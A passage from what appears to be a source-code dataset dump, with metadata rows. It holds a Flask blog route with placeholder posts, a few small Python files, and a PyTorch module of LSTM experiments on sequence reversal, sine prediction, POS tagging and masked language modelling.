"description":"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem...",
"git":"andrelrg",
"tags":["dev", "life"],
"url":"teste-blog"
},
{
"title": "Isso não é um teste",
"description":"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem...",
"git":"andrelrg",
"tags":["dev", "teste"],
"url":"teste-blog"
}
]
threads = [
{
"title": "Teste thread do role",
"description":"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has...",
"url":"teste-blog"
},
{
"title": "Isso não é uma thread teste",
"description":"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has...",
"url":"teste-blog"
},
]
return render_template(
'index.html',
posts=posts,
threads = threads,
active="home",
) | 56.095238 | 603 | 0.611205 | 283 | 2,356 | 5.081272 | 0.349823 | 0.069541 | 0.058414 | 0.063978 | 0.872045 | 0.872045 | 0.872045 | 0.845619 | 0.845619 | 0.845619 | 0 | 0.009932 | 0.316214 | 2,356 | 42 | 604 | 56.095238 | 0.882682 | 0 | 0 | 0.27027 | 0 | 0.054054 | 0.672465 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0.054054 | 0.027027 | 0 | 0.108108 | 0.108108 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
af470bd1fdd9adb905debecd1aaab9914140f9d1 | 39 | py | Python | mirnet/model/__init__.py | prachigaikwad201994/https-github.com-prachi12345-MIRNet | c6812f5bc4ac87e4e63af21aa4e0db84597a17c8 | [
"Apache-2.0"
] | 78 | 2020-12-04T10:38:58.000Z | 2022-03-22T09:16:53.000Z | mirnet/model/__init__.py | prachigaikwad201994/https-github.com-prachi12345-MIRNet | c6812f5bc4ac87e4e63af21aa4e0db84597a17c8 | [
"Apache-2.0"
] | 3 | 2021-01-14T21:46:34.000Z | 2022-02-23T17:20:41.000Z | mirnet/model/__init__.py | prachigaikwad201994/https-github.com-prachi12345-MIRNet | c6812f5bc4ac87e4e63af21aa4e0db84597a17c8 | [
"Apache-2.0"
] | 26 | 2020-12-18T00:56:20.000Z | 2022-03-13T19:30:19.000Z | from .mirnet_model import mirnet_model
| 19.5 | 38 | 0.871795 | 6 | 39 | 5.333333 | 0.666667 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
af8b3667ba74de014f35c494b0517ab92619e8fe | 46 | py | Python | test/run/t199.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | test/run/t199.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | test/run/t199.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | for i in (i*2 for i in range(3)):
print i
| 15.333333 | 33 | 0.565217 | 12 | 46 | 2.166667 | 0.583333 | 0.307692 | 0.461538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0.304348 | 46 | 2 | 34 | 23 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.5 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
afa839fafca90869fd51fd714e826db3a073d094 | 113 | py | Python | kids_math/__init__.py | crvernon/kids_math | 7975d87de9a4fe951ae345bb6ef9167bca236d4e | [
"MIT"
] | null | null | null | kids_math/__init__.py | crvernon/kids_math | 7975d87de9a4fe951ae345bb6ef9167bca236d4e | [
"MIT"
] | null | null | null | kids_math/__init__.py | crvernon/kids_math | 7975d87de9a4fe951ae345bb6ef9167bca236d4e | [
"MIT"
] | null | null | null | from kids_math.utils import *
from kids_math.games import *
# from kids_math.img import ImageQueue
__all__ = []
| 18.833333 | 38 | 0.769912 | 17 | 113 | 4.705882 | 0.529412 | 0.3 | 0.45 | 0.45 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150442 | 113 | 5 | 39 | 22.6 | 0.833333 | 0.318584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
bb8c34917644cc4e9b6fde0552bc7c0e5675e070 | 155 | py | Python | tests/mocks/pycopy-cpython_core/uctypes.py | BradenM/micropython-stubber | 042aee27685dcf0152b6580c005f8a20a04f9d59 | [
"MIT"
] | 126 | 2019-07-19T14:42:41.000Z | 2022-03-21T22:22:19.000Z | tests/mocks/pycopy-cpython_core/uctypes.py | BradenM/micropython-stubber | 042aee27685dcf0152b6580c005f8a20a04f9d59 | [
"MIT"
] | 176 | 2020-10-18T14:31:03.000Z | 2022-03-30T23:22:39.000Z | tests/mocks/pycopy-cpython_core/uctypes.py | BradenM/micropython-stubber | 042aee27685dcf0152b6580c005f8a20a04f9d59 | [
"MIT"
] | 55 | 2019-08-02T09:32:33.000Z | 2021-12-22T11:25:51.000Z | import ctypes
def bytearray_at(addr, sz):
# TODO: Currently just copies contents as bytes, not mutable inplace
return ctypes.string_at(addr, sz)
| 22.142857 | 72 | 0.741935 | 23 | 155 | 4.913043 | 0.826087 | 0.106195 | 0.141593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187097 | 155 | 6 | 73 | 25.833333 | 0.896825 | 0.425806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
a52c458e60eee09c7a484da75200cef9c20629b9 | 45,631 | py | Python | experiments.py | TuKo/dRNN | 150acff49f8cbc0147125ae848da1bb5b3ca8af4 | [
"BSD-3-Clause"
] | 4 | 2020-08-24T09:24:40.000Z | 2021-12-10T05:14:04.000Z | experiments.py | TuKo/dRNN | 150acff49f8cbc0147125ae848da1bb5b3ca8af4 | [
"BSD-3-Clause"
] | null | null | null | experiments.py | TuKo/dRNN | 150acff49f8cbc0147125ae848da1bb5b3ca8af4 | [
"BSD-3-Clause"
] | null | null | null | from datasets import *
from nets import *
from torch.utils.data.dataloader import DataLoader
import torch.nn as nn
import torch.optim as optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
import time
# Definition of experiments
class Experiment(object):
def __init__(self, name=''):
self.name_ = name
@property
def name(self):
return self.name_
@name.setter
def name(self, value):
self.name_ = value
class ReverseExperiment(Experiment):
def __init__(self, dataset_setup, model_layers, delay: int, bidi=False,
batch_size=128, lr=1e-3, lr_schedule=None, max_epochs=50, rnn_units=100,
weight_decay=0, dropout=None, patience=0, data_dir='./data/reverse/',
name='', checkpoint_dir=None, device="cpu"):
super(ReverseExperiment, self).__init__(name)
self.delay = delay
self.model_layers = model_layers
self.batch_size = batch_size
self.max_epochs = max_epochs
self.device = device
self.rnn_units = rnn_units
self.dropout = dropout
self.lr = lr
self.lr_schedule = lr_schedule
self.weight_decay = weight_decay
self.patience = patience
self.bidi = bidi
self.seq_length = None
self.model = None
self.dataset_setup = dataset_setup
self.data_dir = data_dir
self.checkpoint_dir = checkpoint_dir
self.total_params = 0
self.early = {'wait': 0, 'best_loss': 1e15, 'min_delta': 1e-3}
if self.bidi:
self.delay = 0
self.model_layers = 1
elif self.delay > 0:
self.model_layers = 1
def preload_data(self, set_type):
dataset = ReverseData(set_type,
self.dataset_setup['input_classes'],
self.dataset_setup['sequence_length'],
self.dataset_setup['train_size'],
root_dir=self.data_dir,
device=self.device,
transform=DelayTransform(self.delay, device=self.device))
if self.seq_length is None:
self.seq_length = dataset.length
return dataset
def model_setup(self):
# Setup a network based on experiment setup
model = None
if self.model_layers > 1:
# This should be a stacked-LSTM
model = MultiLayerLSTMNet(self.model_layers,
self.dataset_setup['input_classes'],
self.rnn_units,
self.dataset_setup['input_classes'],
dropout=self.dropout).to(self.device)
else:
model = SingleLayerLSTMNet(self.dataset_setup['input_classes'],
self.rnn_units,
self.dataset_setup['input_classes'],
bidi=self.bidi,
dropout=self.dropout).to(self.device)
loss_function = nn.NLLLoss().to(self.device)
if self.weight_decay == 0:
optimizer = optim.Adam(model.parameters(), lr=self.lr)
else:
optimizer = optim.Adam(model.parameters(), lr=self.lr, weight_decay=self.weight_decay)
return model, loss_function, optimizer
def save_model(self, directory):
torch.save({
'model': self.model.state_dict(),
'delay': self.delay,
'model_layers': self.model_layers,
'bidi': self.bidi,
'seq_length': self.seq_length,
}, directory + '/model_weights.pt')
def save_checkpoint(self, epoch, optimizer, loss, results):
if self.checkpoint_dir is None:
return
torch.save({
'epoch': epoch,
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss,
'delay': self.delay,
'model_layers': self.model_layers,
'bidi': self.bidi,
'seq_length': self.seq_length,
'results': results,
'wait': self.early['wait'],
}, self.checkpoint_dir + '/checkpoint_epoch_' + str(epoch) + '.tar')
def check_early_stop(self, current_loss):
# Early stopping disabled?
if self.patience <= 0:
return False
if current_loss - self.early['best_loss'] < - self.early['min_delta']:
self.early['best_loss'] = current_loss
self.early['wait'] = 1
else:
if self.early['wait'] > self.patience:
return True
self.early['wait'] += 1
return False
def run(self):
dataset = self.preload_data("train")
dataloader = DataLoader(dataset, batch_size=self.batch_size, shuffle=True, num_workers=0)
dataset_val = self.preload_data("valid")
dataloader_val = DataLoader(dataset_val, batch_size=self.batch_size, shuffle=False, num_workers=0)
model, loss_function, optimizer = self.model_setup()
self.model = model
self.total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('#Parameters', self.total_params)
# Add the learning rate scheduler
if self.lr_schedule:
scheduler = self.schedule = ReduceLROnPlateau(optimizer,
patience=3,
factor=self.lr_schedule,
threshold=1e-2,
threshold_mode='rel',
eps=1e-5,
verbose=True)
results = {'loss': [],
'val_loss': [],
'acc_val': [],
'acc_test': 1e10,
}
clip = 1.0
for epoch in range(self.max_epochs):
# Training
print('Starting Epoch', epoch)
train_loss = []
for i_batch, sample_batched in enumerate(dataloader):
source_orig, targets = sample_batched['input'], sample_batched['output']
# NOTE: We don't need to reset the initial hidden state because the default is to use zero for c0 and h0
model.zero_grad()
output, _ = model(source_orig)
if self.delay == 0:
char_scores = output
else:
char_scores = output[:, self.delay:, :]
total_loss = loss_function(F.log_softmax(char_scores, dim=2).permute([0, 2, 1]), targets)
total_loss.backward()
_ = nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
train_loss.append(total_loss.item())
print('Batch', i_batch, 'Loss:', total_loss.item(), 'mean loss', sum(train_loss) / (i_batch+1))
# Validation
model.eval()
total_acc, total_items, total_val_loss = self.eval_model(dataloader_val, loss_function)
results['acc_val'].append(total_acc / total_items)
results['val_loss'].append(total_val_loss)
results['loss'].append(train_loss)
print('Validation ACC: ', total_acc / total_items, ' (out of total_items:', total_items, ')')
print('Validation loss: ', total_val_loss)
model.train()
# Save a checkpoint for reference
self.save_checkpoint(epoch, optimizer, loss_function, results)
# Check LR scheduler
if self.lr_schedule:
scheduler.step(total_val_loss)
# Early stopping?
if self.check_early_stop(total_val_loss):
print('Early stopping at epoch %d...' % (epoch))
break
# Test the trained model
model.eval()
dataset_test = self.preload_data("test")
dataloader_test = DataLoader(dataset_test, batch_size=self.batch_size, shuffle=False, num_workers=0)
total_acc, total_items, _ = self.eval_model(dataloader_test, loss_function)
print('Test ACC: ', total_acc / total_items, ' (out of total_items:', total_items, ')')
results['acc_test'] = total_acc / total_items
return results
def eval_model(self, dataloader, loss_function):
total_acc = 0.0
total_items = 0.0
total_loss = 0.0
total_batches = 0
with torch.no_grad():
for i_batch, sample_batched in enumerate(dataloader):
source, targets = sample_batched['input'], sample_batched['output']
batch_size = source.size(0)
# Predict for this batch
output, _ = self.model(source)
# Compute Accuracy for the batch
# NOTE: Softmax missing at the output of the network
if self.delay == 0:
char_scores = output
else:
char_scores = output[:, self.delay:, :]
# use categorical sampling to predict the output of the network. This is in case the network cannot
# predict a value with a higher chance.
pred_cat = torch.distributions.categorical.Categorical(logits=char_scores)
predictions = pred_cat.sample()
acc = (predictions == targets).sum().item()
val_loss = loss_function(F.log_softmax(char_scores, dim=2).permute([0, 2, 1]), targets)
total_loss += val_loss.item()
total_acc += acc
total_items += batch_size * self.seq_length
total_batches += 1
return total_acc, total_items, total_loss / total_batches
class SineExperiment(Experiment):
def __init__(self, dataset_setup, model_layers, delay: int, bidi=False,
batch_size=128, lr=1e-3, lr_schedule=None, max_epochs=50, rnn_units=100,
weight_decay=0, dropout=None, patience=0, data_dir='./data/sin/',
name='', checkpoint_dir=None, device="cpu"):
super(SineExperiment, self).__init__(name)
self.delay = delay
self.model_layers = model_layers
self.batch_size = batch_size
self.max_epochs = max_epochs
self.device = device
self.rnn_units = rnn_units
self.dropout = dropout
self.lr = lr
self.lr_schedule = lr_schedule
self.weight_decay = weight_decay
self.patience = patience
self.bidi = bidi
self.seq_length = None
self.model = None
self.dataset_setup = dataset_setup
self.data_dir = data_dir
self.checkpoint_dir = checkpoint_dir
self.total_params = 0
self.early = {'wait': 0, 'best_loss': 1e15, 'min_delta': 1e-2}
if self.bidi:
self.delay = 0
self.model_layers = 1
elif self.delay > 0:
self.model_layers = 1
def preload_data(self, set_type):
dataset = SineData(set_type,
self.dataset_setup['scale'],
self.dataset_setup['causality'],
self.dataset_setup['acausality'],
self.dataset_setup['sequence_length'],
self.dataset_setup['train_size'],
root_dir=self.data_dir,
device=self.device,
transform=DelayTransform(self.delay, device=self.device))
if self.seq_length is None:
self.seq_length = dataset.length
return dataset
def model_setup(self):
model = None
if self.model_layers > 1:
# This should be a stacked-LSTM
model = MultiLayerLSTMNet(self.model_layers,
1,
self.rnn_units,
1,
bidi=self.bidi,
dropout=self.dropout).to(self.device)
else:
model = SingleLayerLSTMNet(1,
self.rnn_units,
1,
bidi=self.bidi,
dropout=self.dropout).to(self.device)
loss_function = nn.MSELoss().to(self.device)
if self.weight_decay == 0:
optimizer = optim.Adam(model.parameters(), lr=self.lr)
else:
optimizer = optim.Adam(model.parameters(), lr=self.lr, weight_decay=self.weight_decay)
return model, loss_function, optimizer
def save_model(self, directory):
torch.save({
'model': self.model.state_dict(),
'delay': self.delay,
'model_layers': self.model_layers,
'bidi': self.bidi,
}, directory + '/model_weights.pt')
def save_checkpoint(self, epoch, optimizer, loss, results):
if self.checkpoint_dir is None:
return
torch.save({
'epoch': epoch,
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss,
'delay': self.delay,
'model_layers': self.model_layers,
'bidi': self.bidi,
'seq_length': self.seq_length,
'results': results,
'wait': self.early['wait'],
}, self.checkpoint_dir + '/checkpoint_epoch_' + str(epoch) + '.tar')
def check_early_stop(self, current_loss):
# Early stopping disabled?
if self.patience <= 0:
return False
if current_loss - self.early['best_loss'] < - self.early['min_delta']:
self.early['best_loss'] = current_loss
self.early['wait'] = 1
else:
if self.early['wait'] > self.patience:
return True
self.early['wait'] += 1
return False
def run(self):
dataset = self.preload_data("train")
dataloader = DataLoader(dataset, batch_size=self.batch_size, shuffle=True, num_workers=0)
dataset_val = self.preload_data("valid")
dataloader_val = DataLoader(dataset_val, batch_size=self.batch_size, shuffle=False, num_workers=0)
model, loss_function, optimizer = self.model_setup()
self.model = model
self.total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('#Parameters', self.total_params)
# Add the learning rate scheduler
if self.lr_schedule:
scheduler = self.schedule = ReduceLROnPlateau(optimizer,
patience=3,
factor=self.lr_schedule,
threshold=1e-2,
threshold_mode='rel',
eps=1e-5,
verbose=True)
results = {'loss': [],
'val_loss': [],
'mse_val': [],
'mse_test': 1e10,
}
clip = 1.0
for epoch in range(self.max_epochs):
# Training
print('Starting Epoch', epoch)
train_loss = []
for i_batch, sample_batched in enumerate(dataloader):
source_orig, targets = sample_batched['input'], sample_batched['output']
# NOTE: We don't need to reset the initial hidden state because the default is to use zero for c0 and h0
model.zero_grad()
output, _ = model(source_orig)
if self.delay == 0:
filtered_output = output
else:
filtered_output = output[:, self.delay:, :]
total_loss = loss_function(filtered_output, targets)
total_loss.backward()
_ = nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
train_loss.append(total_loss.item())
print('Batch', i_batch, 'Loss:', total_loss.item(), 'mean loss', sum(train_loss) / (i_batch+1))
# Validation
model.eval()
total_mse, total_items, total_val_loss = self.eval_model(dataloader_val, loss_function)
results['mse_val'].append(total_mse / total_items)
results['val_loss'].append(total_val_loss)
results['loss'].append(train_loss)
print('Validation MSE: ', total_mse / total_items, ' (out of total_items:', total_items, ')')
print('Validation loss: ', total_val_loss)
model.train()
# Save a checkpoint for reference
self.save_checkpoint(epoch, optimizer, loss_function, results)
# Check LR scheduler
if self.lr_schedule:
scheduler.step(total_val_loss)
# Early stopping?
if self.check_early_stop(total_val_loss):
print('Early stopping at epoch %d...' % (epoch))
break
# check for total convergence
if total_val_loss < 1e-5:
print('Automatic stopping due to MSE error is zero')
break
# Test the trained model
model.eval()
dataset_test = self.preload_data("test")
dataloader_test = DataLoader(dataset_test, batch_size=self.batch_size, shuffle=False, num_workers=0)
total_mse, total_items, _ = self.eval_model(dataloader_test, loss_function)
print('Test MSE: ', total_mse / total_items, ' (out of total_items:', total_items, ')')
results['mse_test'] = total_mse / total_items
return results
def eval_model(self, dataloader, loss_function):
total_acc = 0.0
total_items = 0.0
total_loss = 0.0
total_batches = 0
with torch.no_grad():
for i_batch, sample_batched in enumerate(dataloader):
source, targets = sample_batched['input'], sample_batched['output']
batch_size = source.size(0)
# Predict for this batch
output, _ = self.model(source)
# Compute Accuracy for the batch
# NOTE: Softmax missing at the output of the network
if self.delay == 0:
filtered_output = output
else:
filtered_output = output[:, self.delay:, :]
acc = ((filtered_output - targets)**2).sum().item()
val_loss = loss_function(filtered_output, targets)
total_loss += val_loss.item()
total_acc += acc
total_items += batch_size * self.seq_length
total_batches += 1
return total_acc, total_items, total_loss / total_batches
class POSExperiment(Experiment):
def __init__(self, language, char_delay, char_units, char_embeddings, word_delay, word_units, word_embeddings,
pretrained_word_embeddings=False,
model_layers=1, bidi_char=False, bidi_sentence=False,
batch_size=128, lr=1e-3, lr_schedule=None, max_epochs=50,
weight_decay=0, dropout=None, patience=0, data_dir='./data/',
name='', checkpoint_dir=None, device="cpu"):
super(POSExperiment, self).__init__(name)
self.char_delay = char_delay
self.word_delay = word_delay
self.char_units = char_units
self.word_units = word_units
self.char_embeddings_dim = char_embeddings
self.word_embeddings_dim = word_embeddings
self.pretrained_word_embeddings = pretrained_word_embeddings
self.embeddings = None
self.model = None
self.model_layers = model_layers
self.batch_size = batch_size
self.max_epochs = max_epochs
self.dropout = dropout
self.lr = lr
self.lr_schedule = lr_schedule
self.weight_decay = weight_decay
self.patience = patience
self.bidi_char = bidi_char
self.bidi_sentence = bidi_sentence
self.language = language
self.device = device
self.data_dir = data_dir
self.checkpoint_dir = checkpoint_dir
self.total_params = 0
self.early = {'wait': 0, 'best_loss': 1e15, 'min_delta': 1e-2}
if self.bidi_char:
self.char_delay = 0
if self.bidi_sentence:
self.word_delay = 0
self.model_layers = 1
elif self.word_delay > 0:
self.model_layers = 1
def preload_data(self, set_type):
dataset = UD(set_type,
self.language,
root_dir=self.data_dir,
device=self.device,
transform=POSDelayTransform(self.char_delay, self.word_delay, device=self.device))
self.num_chars = dataset.get_num_chars()
self.num_words = dataset.get_num_words()
self.num_pos_tags = dataset.get_num_pos_tags()
self.embeddings = self.load_embedding(dataset)
return dataset
def load_embedding(self, dataset):
if self.pretrained_word_embeddings:
embeddings = dataset.get_embeddings()
self.word_embeddings_dim = embeddings.size(1)
else:
embeddings = None
return embeddings
def model_setup(self):
model = POSNet(self.num_chars, self.char_embeddings_dim, self.char_units,
self.word_units, self.num_words, self.word_embeddings_dim,
self.num_pos_tags, word_embedding=self.embeddings, word_delay=self.word_delay,
bidi_char=self.bidi_char, bidi_sentence=self.bidi_sentence,
device=self.device).to(self.device)
loss_function = nn.NLLLoss().to(self.device)
optimizer = optim.Adam(model.parameters(), lr=self.lr)
return model, loss_function, optimizer
def save_model(self, directory):
torch.save({
'model': self.model.state_dict(),
'char_delay': self.char_delay,
'word_delay': self.word_delay,
'model_layers': self.model_layers,
'bidi_char': self.bidi_char,
'bidi_sentence': self.bidi_sentence,
}, directory + '/model_weights.pt')
def save_checkpoint(self, epoch, optimizer, loss, results):
if self.checkpoint_dir is None:
return
torch.save({
'epoch': epoch,
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss,
'char_delay': self.char_delay,
'word_delay': self.word_delay,
'model_layers': self.model_layers,
'bidi_char': self.bidi_char,
'bidi_sentence': self.bidi_sentence,
'results': results,
'wait': self.early['wait'],
}, self.checkpoint_dir + '/checkpoint_epoch_' + str(epoch) + '.tar')
def check_early_stop(self, current_loss):
# Early stopping disabled?
if self.patience <= 0:
return False
if current_loss - self.early['best_loss'] < - self.early['min_delta']:
self.early['best_loss'] = current_loss
self.early['wait'] = 1
else:
if self.early['wait'] > self.patience:
return True
self.early['wait'] += 1
return False
def run(self):
dataset = self.preload_data("train")
dataloader = DataLoader(dataset, batch_size=self.batch_size, shuffle=True, num_workers=0)
dataset_val = self.preload_data("valid")
dataloader_val = DataLoader(dataset_val, batch_size=self.batch_size, shuffle=False, num_workers=0)
model, loss_function, optimizer = self.model_setup()
self.model = model
self.total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('#Parameters', self.total_params)
# Add the learning rate scheduler
if self.lr_schedule:
scheduler = self.schedule = ReduceLROnPlateau(optimizer,
patience=3,
factor=self.lr_schedule,
threshold=1e-2,
threshold_mode='rel',
eps=1e-5,
verbose=True)
results = {'loss': [],
'val_loss': [],
'acc_val': [],
'acc_test': 1e10,
}
clip = 1.0
for epoch in range(self.max_epochs):
# Training
print('Starting Epoch', epoch)
train_loss = []
for i_batch, sample_batched in enumerate(dataloader):
sentence = sample_batched['input_sentence']
words = sample_batched['input_chars']
targets = sample_batched['output']
sentence_length = sample_batched['sen_length']
words_length = sample_batched['words_length']
batch_size = sentence_length.size(0)
model.zero_grad()
output = model(sentence, sentence_length, words, words_length)
output = F.log_softmax(output, dim=2).permute([0, 2, 1])
# Need to do softmax based on the length of each sentence.
hidden_dim = output.size(1)
sen_length = sentence_length[0] - self.word_delay - 1
total_loss = loss_function(output[0, :, self.word_delay+1:sentence_length[0]-1].view(1, hidden_dim, -1),
targets[0, 1:sen_length].view(1, -1))
for s in range(1, batch_size):
sen_length = sentence_length[s] - self.word_delay - 1
total_loss += loss_function(output[s, :, self.word_delay+1:sentence_length[s]-1].view(1, hidden_dim, -1),
targets[s, 1:sen_length].view(1, -1))
total_loss.backward()
_ = nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
train_loss.append(total_loss.item())
print('Batch', i_batch, 'Loss:', total_loss.item(), 'mean loss', sum(train_loss) / (i_batch+1))
# Validation
model.eval()
total_acc, total_items, total_val_loss = self.eval_model(dataloader_val, loss_function)
results['acc_val'].append(total_acc / total_items)
results['val_loss'].append(total_val_loss)
results['loss'].append(train_loss)
print('Validation ACC: ', total_acc / total_items, ' (out of total_items:', total_items, ')')
print('Validation loss: ', total_val_loss)
model.train()
# Save a checkpoint for reference
self.save_checkpoint(epoch, optimizer, loss_function, results)
# Check LR scheduler
if self.lr_schedule:
scheduler.step(total_val_loss)
# Early stopping?
if self.check_early_stop(total_val_loss):
print('Early stopping at epoch %d...' % (epoch))
break
# Test the trained model
model.eval()
dataset_test = self.preload_data("test")
dataloader_test = DataLoader(dataset_test, batch_size=self.batch_size, shuffle=False, num_workers=0)
total_acc, total_items, _ = self.eval_model(dataloader_test, loss_function)
print('Test ACC: ', total_acc / total_items, ' (out of total_items:', total_items, ')')
results['acc_test'] = total_acc / total_items
return results
def eval_model(self, dataloader, loss_function):
total_acc = 0.0
total_items = 0.0
total_loss = 0.0
total_batches = 0
with torch.no_grad():
for i_batch, sample_batched in enumerate(dataloader):
sentence = sample_batched['input_sentence']
words = sample_batched['input_chars']
targets = sample_batched['output']
sentence_length = sample_batched['sen_length']
words_length = sample_batched['words_length']
batch_size = sentence.size(0)
# Predict for this batch
output = self.model(sentence, sentence_length, words, words_length)
# Compute Accuracy for the batch
# NOTE: Softmax missing at the output of the network
filtered_output = output
output = F.log_softmax(filtered_output, dim=2).permute([0, 2, 1])
hidden_dim = output.size(1)
_, predictions = torch.max(filtered_output, 2)
acc = 0.0
for s in range(batch_size):
sen_length = sentence_length[s] - self.word_delay - 1
acc += (predictions[s, self.word_delay+1:sentence_length[s]-1] == targets[s, 1:sen_length]).sum().item()
total_loss += loss_function(output[s, :, self.word_delay+1:sentence_length[s]-1].view(1, hidden_dim, -1),
targets[s, 1:sen_length].view(1, -1)).item()
total_acc += acc
total_items += (sentence_length - self.word_delay - 2).sum().item()
total_batches += 1
return total_acc, total_items, total_loss / total_batches
class MLMExperiment(Experiment):
def __init__(self, dataset_setup, layers, delay: int, bidi=False, seq_length=180,
batch_size=32, lr=1e-3, lr_schedule=None, max_epochs=50, rnn_units=100, embedding_size=10,
weight_decay=0, dropout=None, patience=0, data_dir='./data/',
name='', checkpoint_dir=None, device="cpu"):
super(MLMExperiment, self).__init__(name)
self.delay = delay
self.model_layers = layers
self.embedding_size = embedding_size
self.batch_size = batch_size
self.max_epochs = max_epochs
self.device = device
self.rnn_units = rnn_units
self.dropout = dropout
self.lr = lr
self.lr_schedule = lr_schedule
self.weight_decay = weight_decay
self.patience = patience
self.bidi = bidi
self.seq_length = seq_length
self.alphabet = None
self.model = None
self.dataset_setup = dataset_setup
self.data_dir = data_dir
self.checkpoint_dir = checkpoint_dir
self.total_params = 0
self.early = {'wait': 0, 'best_loss': 1e15, 'min_delta': 1e-2}
if self.bidi or self.model_layers > 1:
self.delay = 0
if self.delay > 0:
self.model_layers = 1
# percentage of masked elements
self.p = 0.2
def preload_data(self, set_type):
dataset = Text8(set_type,
root_dir=self.data_dir,
length=self.seq_length,
alphabet=self.alphabet,
device=self.device,
output_shift=False,
delay=self.delay,
transform=None)
return dataset
def model_setup(self):
model = None
print('Creating Model delay=', self.delay, ', layers=', self.model_layers, ', units=', self.rnn_units,
', bidi=', self.bidi, ', embedding=', self.embedding_size, 'device=', self.device)
if self.model_layers > 1:
# This should be a stacked-LSTM
model = MultiLayerLSTMNet(self.model_layers,
len(self.alphabet)+1, # +1 for the mask
self.rnn_units,
output_size=len(self.alphabet),
bidi=self.bidi,
embedding_size=self.embedding_size,
dropout=self.dropout).to(self.device)
else:
model = SingleLayerLSTMNet(len(self.alphabet)+1, # +1 for the mask
self.rnn_units,
output_size=len(self.alphabet),
bidi=self.bidi,
embedding_size=self.embedding_size,
dropout=self.dropout).to(self.device)
loss_function = nn.NLLLoss().to(self.device)
if self.weight_decay == 0:
optimizer = optim.Adam(model.parameters(), lr=self.lr)
else:
optimizer = optim.Adam(model.parameters(), lr=self.lr, weight_decay=self.weight_decay)
return model, loss_function, optimizer
def save_model(self, directory):
torch.save({
'model': self.model.state_dict(),
'delay': self.delay,
'model_layers': self.model_layers,
'embedding_size': self.embedding_size,
